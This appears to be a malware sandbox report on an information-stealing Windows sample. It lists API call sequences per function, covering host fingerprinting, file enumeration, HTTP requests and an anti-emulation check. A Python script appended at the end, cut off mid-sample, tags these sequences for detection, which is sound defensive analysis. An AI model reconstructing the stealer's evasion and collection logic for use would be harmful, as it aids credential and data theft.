                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: ec7729464b3350146d7551db680a935a85c3c450238b9b5fff99dc3ff4a44077
                                  • Instruction ID: d9ebfb5a1a65e515f81c93faab40be2dbcfb4c0fd3cc4515738505f67c9081de
                                  • Opcode Fuzzy Hash: ec7729464b3350146d7551db680a935a85c3c450238b9b5fff99dc3ff4a44077
                                  • Instruction Fuzzy Hash: 9C818075A12315ABEB22DFA4DC9AFAE77B8AF44700F154058F905EB2C0DB70AD05CB90
                                  APIs
                                  • lstrlen.KERNEL32(010169E0), ref: 0031F315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F47B
                                  • lstrcpy.KERNEL32(00000000,010169E0), ref: 0031F4BB
                                  • lstrcpy.KERNEL32(00000000,01028B00), ref: 0031F4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0031F61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0031F718
                                  • lstrlen.KERNEL32(01028BA0), ref: 0031F746
                                  • lstrcpy.KERNEL32(00000000,01028BA0), ref: 0031F771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031F793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0031FA32
                                  • lstrlen.KERNEL32(01028A90), ref: 0031FA60
                                  • lstrcpy.KERNEL32(00000000,01028A90), ref: 0031FA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031FAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031FAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: df55b2e2f58ddc7d50325a2ac171c64202d66313adfc09e9079e96df096e86bd
                                  • Instruction ID: 9a0436d7b2b52a71e5d42a6639f9002b6a37c67f2a7555244350ee7e2c0a19b7
                                  • Opcode Fuzzy Hash: df55b2e2f58ddc7d50325a2ac171c64202d66313adfc09e9079e96df096e86bd
                                  • Instruction Fuzzy Hash: 4FF15070A01202CFCB2ACF69C858AA5B7F5BF58314B1A81BDD4099B3A1DB35DC86DF50

                                  Control-flow Graph

[Control-flow graph image, function at 318ca0: basic blocks calling StrCmpCA, ExitProcess, lstrlen and lstrcpy, with internal calls to 302a20 and 302930]
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 493a5cc9072c3210e4ce2ceed7a7f5fd691718fdbf01a1c23579bac7de3e163e
                                  • Instruction ID: ce7a63459b4d198b0002c3a448c6accd37a89f327c523d4d2f78065e44866c18
                                  • Opcode Fuzzy Hash: 493a5cc9072c3210e4ce2ceed7a7f5fd691718fdbf01a1c23579bac7de3e163e
                                  • Instruction Fuzzy Hash: CB517F70A04701EFC7269F75DCC8AAB7BF8BB18700B10481DE442D6650DFB8E9859F65

                                  Control-flow Graph

[Control-flow graph image, function at 322740: basic blocks calling GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA, with an internal call to 3271e0]
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0032277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003193B6,00000000,00000000,00000000,00000000), ref: 003227AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0032280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322816
                                  • wsprintfA.USER32 ref: 0032283B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
                                  • Opcode ID: 07c4dcac7da0f11e36c3fdece6ad4684fea2c96dcbca8716cb384a0b06985cb4
                                  • Instruction ID: e7ec2aa9449018f09eeb7547197234841bf5291fe98e44a9ab9c2d20f8d0414a
                                  • Opcode Fuzzy Hash: 07c4dcac7da0f11e36c3fdece6ad4684fea2c96dcbca8716cb384a0b06985cb4
                                  • Instruction Fuzzy Hash: 92316DB1908219AFCB15CFB89D859EFFFBCEF58710F10016AE505E7650E2349B408BA1

                                  Control-flow Graph

[Control-flow graph image, function at 304bc0: basic blocks calling ??2@YAPAXI@Z (three times), lstrlen and InternetCrackUrlA, with an internal call to 302a20]
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00304BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00304C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00304C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 00304C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 00304C27
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 9bebd8a5bf0c7a4cf5ffa1a19b32ee9520cbd841bdcd5f87d5033c1aceb373c9
                                  • Instruction ID: 441c200ee92b79a5cd15601772d7121d91a1220fb661ffdc1114a12da84c1992
                                  • Opcode Fuzzy Hash: 9bebd8a5bf0c7a4cf5ffa1a19b32ee9520cbd841bdcd5f87d5033c1aceb373c9
                                  • Instruction Fuzzy Hash: B2012D71D01218ABDB15DFA8EC45B9EBBB8EB18320F00816AF954E7390EF7459058FD4

                                  Control-flow Graph

[Control-flow graph image, function at 301030: basic blocks calling GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc and VirtualFree]
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00301046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 0030104D
                                  • ExitProcess.KERNEL32 ref: 00301058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0030106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003010AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: fb3e30018bb748e9cc3b5ca1374d0be3fef68c8906abb88448ab92387a972972
                                  • Instruction ID: 5fda74897736674e12a23fda76fbface699bdde1e4567edbbe82d2d3416bf55a
                                  • Opcode Fuzzy Hash: fb3e30018bb748e9cc3b5ca1374d0be3fef68c8906abb88448ab92387a972972
                                  • Instruction Fuzzy Hash: 4E01F4B57413047BE7244A656C6EF6B77ADA794B05F208014F744E73C0D9B1EA049664

                                  Control-flow Graph

[Control-flow graph image, function at 31ee90: basic blocks calling lstrcpy and StrCmpCA, with internal calls to 302930, 306c40 and 302a20]
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0031EEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0031EF3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: f22ddeca0843ba06d9d2181f476501ed80faae4b0617e016acf0da9b1a7e2f99
                                  • Instruction ID: 86b79cff1e19f98a7dc1675ff874e7e64d87c58d0ed4b731c914828cdec0c5b5
                                  • Opcode Fuzzy Hash: f22ddeca0843ba06d9d2181f476501ed80faae4b0617e016acf0da9b1a7e2f99
                                  • Instruction Fuzzy Hash: D9210E717212069BCB27FF78DC5AA9B37A4AF14300F055428BC4ADF292DF31E8658B90

                                  Control-flow Graph

[Control-flow graph image, function at 3010c0: basic blocks calling GlobalMemoryStatusEx and ExitProcess]
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 94e7d241528325c7e41489d36e621dabda7999413dfc5bd62789dcba799cfeaa
                                  • Instruction ID: eae0ee3c2e76418a08834ddffb6bad537fc94f3039e75d583f35b09af430232e
                                  • Opcode Fuzzy Hash: 94e7d241528325c7e41489d36e621dabda7999413dfc5bd62789dcba799cfeaa
                                  • Instruction Fuzzy Hash: 86F0ECB011A2455BEB5D6A68DC6A72DF7D8EB11350F104929EEDBC32D1E670C8409167

                                  Control-flow Graph

[Control-flow graph image, function at 318c88: basic blocks calling StrCmpCA, ExitProcess, lstrlen and lstrcpy, with internal calls to 302a20 and 302930]
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: eade11d6097ed0792b45e90cb87a165efacbf09c31134b60d1e5328e05f39f5f
                                  • Instruction ID: 7f041f22e7bff74c03e0a1026d27338778424beb578155f6421c3a126dccea9f
                                  • Opcode Fuzzy Hash: eade11d6097ed0792b45e90cb87a165efacbf09c31134b60d1e5328e05f39f5f
                                  • Instruction Fuzzy Hash: 73E0D875405355FFCB159BB9CC58882BFB8EF1A304B4508DDE9006F660D671BC05D7A9

                                  Control-flow Graph (function starting at 322ad0; the rendered graph was not extracted, so its basic blocks are listed with the APIs they call)

                                  • 322ad0-322b22: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; branches to 322b24-322b36 or 322b44-322b59
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00322AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00322B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: a02edf615d3c2476878be8b36bd9ff650e28d0f85bc43621160cd1a48ff8ef82
                                  • Instruction ID: be6a171efa346d155eb89e3543cb3c04f5fc416a799b535a1e174e24a4d3d667
                                  • Opcode Fuzzy Hash: a02edf615d3c2476878be8b36bd9ff650e28d0f85bc43621160cd1a48ff8ef82
                                  • Instruction Fuzzy Hash: 8E01D6B6A44618ABC710CF99ED89B9EF7B8F744B21F00026AF915D3780D7741904C7A1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00301046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 0030104D
                                  • ExitProcess.KERNEL32 ref: 00301058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0030106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003010AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: a17b3778a4b80a999fd54253a833e187e6425887a79b134afc6da7bffcd691ad
                                  • Instruction ID: 491bba596b1646d127546a9be0645d5b175bb7c7b63be417bc83a0238132145c
                                  • Opcode Fuzzy Hash: a17b3778a4b80a999fd54253a833e187e6425887a79b134afc6da7bffcd691ad
                                  • Instruction Fuzzy Hash: A2E08CB42483807EEA2203B15C1EF133F6C9F13B01F040481F280AA1D2C5D0A404A664
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003123D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003123F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00312402
                                  • lstrlen.KERNEL32(\*.*), ref: 0031240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00312436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00312486
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 527d99896a89b8c5bbae0d7735c8f13b5b3096709ffe8d2d8543e28be1ba7e0b
                                  • Instruction ID: bfa9a3f5590b491cf8920e0f4bc17e5c5301437f201e99fa5c3711706344ba9a
                                  • Opcode Fuzzy Hash: 527d99896a89b8c5bbae0d7735c8f13b5b3096709ffe8d2d8543e28be1ba7e0b
                                  • Instruction Fuzzy Hash: 73A27E71A116169BCB27AFB8DC9CAEF77B9AF18300F054028F805A7291DF74DD598B90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003016E2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030176C
                                  • lstrcat.KERNEL32(00000000), ref: 00301776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003017A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003017EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003017F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301875
                                  • lstrcat.KERNEL32(00000000), ref: 0030187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003018AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003018F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003018FE
                                  • lstrlen.KERNEL32(00331794), ref: 00301909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301929
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301966
                                  • lstrlen.KERNEL32(\*.*), ref: 00301971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0030199A
                                    • Part of subcall function 00324040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0032406D
                                    • Part of subcall function 00324040: lstrcpy.KERNEL32(00000000,?), ref: 003240A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003019C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301A16
                                  • lstrlen.KERNEL32(00331794), ref: 00301A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301A41
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301A81
                                  • lstrlen.KERNEL32(00331794), ref: 00301A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301AAC
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00301B45
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 00301B70
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00301B8A
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301C03
                                  • lstrlen.KERNEL32(00331794), ref: 00301C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301C31
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301C74
                                  • lstrlen.KERNEL32(00331794), ref: 00301C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301CA2
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301CAE
                                  • lstrlen.KERNEL32(?), ref: 00301CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301CE9
                                  • lstrlen.KERNEL32(00331794), ref: 00301CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301D14
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301DEB
                                  • lstrlen.KERNEL32(00331794), ref: 00301DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301E19
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301E56
                                  • lstrlen.KERNEL32(00331794), ref: 00301E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301E81
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301E8D
                                  • lstrlen.KERNEL32(?), ref: 00301E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00301F45
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301F9F
                                  • lstrlen.KERNEL32(01028990), ref: 00301FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301FE3
                                  • lstrlen.KERNEL32(00331794), ref: 00301FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030200E
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00302042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030204D
                                  • lstrlen.KERNEL32(00331794), ref: 00302058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302075
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00302081
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 4075be6b45e1b2ac00990b6ac88ecee8da4d3d0df16a301fe22a9f48cc3d51e1
                                  • Instruction ID: aafb22aa570408b7abc61236fabe11b81aa666ca17a357b4877fadb216d77b6c
                                  • Opcode Fuzzy Hash: 4075be6b45e1b2ac00990b6ac88ecee8da4d3d0df16a301fe22a9f48cc3d51e1
                                  • Instruction Fuzzy Hash: 40929571A122169BCB23EFA4DDACAAF77B9AF14700F054124F805AB291DF74DD09DB90
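The per-function API listings above (the hostname routine at 00322AD0, the VirtualAllocExNuma/VirtualAlloc routine at 00301046, and the two "\*.*" enumeration routines whose calls sit at 003123D4 and 003016E2 onward) are more useful as ordered call sequences than as sets of API names. The script below is an added example, not code from the Joe Sandbox report or from the Stealc sample: it parses lines in the report's "• API.MODULE(args), ref: ADDR" format, groups them under each "APIs" heading, and applies ordered-subsequence rules over each function. The sample input is a constructed excerpt of call lines copied from the listings above. The rule names, the 256 MiB size threshold, and the assumption that the report's VirtualAlloc argument list follows the Win32 signature (dwSize second) are this example's own choices.

```python
"""Sequence rules over Joe Sandbox per-function API listings (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Matches one call line of the listing, e.g.
#   • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00322B1A
#   • ExitProcess.KERNEL32 ref: 00301058            (no argument list in the report)
#   • Part of subcall function 00324040: SHGetFolderPathA.SHELL32(...), ref: 0032406D
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                       # call-site address from the "ref:" field
    subcall: Optional[int] = None  # set when the line is "Part of subcall function ..."

@dataclass
class FunctionEntry:
    calls: List[Call] = field(default_factory=list)

    @property
    def first_ref(self) -> int:
        return min(c.ref for c in self.calls)

def parse_listing(text: str) -> List[FunctionEntry]:
    """Split the report text at each 'APIs' heading and collect the call lines under it."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        current.calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return [e for e in entries if e.calls]

def in_order(calls: List[Call], pattern: List[str]) -> bool:
    """True if the API names in `pattern` appear in this order (not necessarily adjacent)."""
    names = iter(c.api for c in calls)
    return all(any(name == want for name in names) for want in pattern)

def hex_arg(call: Call, index: int) -> Optional[int]:
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):  # "?" marks an argument the report could not resolve
        return None

def classify(entry: FunctionEntry) -> List[str]:
    """Rule names are this example's own labels, not Joe Sandbox signature names."""
    tags, calls = [], entry.calls
    apis = {c.api for c in calls}
    # VirtualAllocExNuma followed by ExitProcess: the process quits when the NUMA
    # allocation fails, which it does on emulators that do not implement the API.
    if in_order(calls, ["VirtualAllocExNuma", "ExitProcess"]):
        tags.append("numa-alloc-probe")
    # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect): dwSize is args[1].
    for c in calls:
        if c.api == "VirtualAlloc":
            size = hex_arg(c, 1)
            if size is not None and size >= 256 * 1024 * 1024:  # threshold is an assumption
                tags.append(f"large-alloc:{size // (1024 * 1024)}MiB")
    if in_order(calls, ["RtlAllocateHeap", "GetComputerNameA"]):
        tags.append("hostname-collection")
    # A search path ending in "\*.*" handed to FindFirstFileA is a directory walk.
    if "FindFirstFileA" in apis and any(c.api == "lstrcat" and c.args[-1:] == [r"\*.*"] for c in calls):
        tags.append("directory-enumeration")
    # Two StrCmpCA right after FindFirstFileA: the found name is compared against two
    # fixed strings before use (the report shows their addresses, not their text).
    if in_order(calls, ["FindFirstFileA", "StrCmpCA", "StrCmpCA"]):
        tags.append("filters-found-entries")
    if "GetFileAttributesA" in apis:
        tags.append("path-existence-check")
    return tags

def analyse(text: str) -> dict:
    return {f"{e.first_ref:08X}": classify(e) for e in parse_listing(text)}

# Constructed sample: call lines copied from the listings in this report.
SAMPLE = r"""
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00322AFF
• RtlAllocateHeap.NTDLL(00000000), ref: 00322B06
• GetComputerNameA.KERNEL32(00000000,00000104), ref: 00322B1A
APIs
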